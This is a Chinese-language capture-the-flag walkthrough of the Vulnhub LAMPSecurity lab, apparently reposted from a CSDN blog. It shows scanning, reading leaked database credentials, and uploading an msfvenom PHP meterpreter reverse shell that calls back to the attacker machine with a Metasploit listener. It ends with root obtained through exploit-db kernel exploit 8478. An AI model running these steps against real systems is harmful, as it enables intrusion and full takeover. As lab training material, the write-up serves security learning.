标签:尝试 LAMPSecurity PID 192.168 CTF Vulnhub PHP 上传 8478
0x00环境
攻击机IP:192.168.1.28
目标机IP:192.168.1.24
0x01实战
端口扫描
nmap -sV -p- 192.168.1.24
可以看到开放了很多端口
目录扫描
扫描出一堆东西
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QfspI76M-1643184742322)(img/image-20220126094242126.png)]](https://www.icode9.com/i/ll/?i=d66c2d1b1fef46abb1706cabde75a296.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
漏洞发现
根据扫描出来的目录查找发现
直接可以看到phpinfo
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-F5ai6RPe-1643184742323)(img/image-20220126094346525.png)]](https://www.icode9.com/i/ll/?i=fca72255d3734af0a973f3e10e8a4cc7.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
可以访问db.sql文件,直接得到数据库账户和密码
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IEaQuKKm-1643184742324)(img/image-20220126095209987.png)]](https://www.icode9.com/i/ll/?i=52236421eba640deaac0e1c6610da459.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
等还有其它的一些东西就不列举了。。。
漏洞利用
访问80端口HTTP服务可以知道本网站由Toby Victor开发。它由PHP和MySQL提供支持,并托管在CentOSlinux 服务器上。
尝试使用上面得到的账户admin/adminpass登录网站
成功登录,登录后我们可以发现我们可以编辑页面并上传图片
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5Hp4QQvv-1643184742326)(img/image-20220126100427410.png)]](https://www.icode9.com/i/ll/?i=7910b55a0e35497baa848a3e58951e55.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
而且前面我们在网站主页得知是支持PHP的,那么我们可以尝试上传木马文件反弹shell
创建PHP木马文件尝试通过文件上传来上传
msfvenom -p php/meterpreter/reverse_tcp -o /root/shell.php lhost=192.168.1.28 lport=4444
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3WhR9qHs-1643184742326)(img/image-20220126101212409.png)]](https://www.icode9.com/i/ll/?i=f0326518af994d1494da6e7a4b2e7d8b.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
尝试上传,如果失败再尝试绕过
在主页可以看到上传成功
创建监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.28
set lport 4444
run
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-n2xWwy8O-1643184742328)(img/image-20220126101655914.png)]](https://www.icode9.com/i/ll/?i=e4f1ed4235dd49f9b943c6ae514a2ec0.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
在主页上点击Read more即可反弹shell
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rpUHyEzV-1643184742329)(img/image-20220126101745127.png)]](https://www.icode9.com/i/ll/?i=a9fb4db93a694b53b4012b1ebcb66bc4.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TjUhoJSo-1643184742329)(img/image-20220126101814703.png)]](https://www.icode9.com/i/ll/?i=d3b3a01baaa44a179e66d7121b6c3d0c.png)
提权
查看系统信息
sysinfo
不知为何无法执行命令
使用老版kali(192.168.1.12)
内核版本为2.6.18-92.el5,在互联网查漏洞利用https://www.exploit-db.com/exploits/8478
将提权脚本下载并查看
将dos格式修改为linux格式
dos2unix 8478.sh
上传到靶机上的tmp目录中
赋予脚本执行权限并执行
chmod +x 8478.sh
报错,因为必须为脚本提供正确的 PID 才能使代码正常工作。所以现在我们必须找到一个合适的 PID,并在该 PID 的帮助下运行脚本
cat /proc/net/netlink
执行脚本,多尝试几次,成功得到root权限
./8478.sh 568
标签:尝试,LAMPSecurity,PID,192.168,CTF,Vulnhub,PHP,上传,8478 来源: https://blog.csdn.net/qq_44276741/article/details/122704057
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。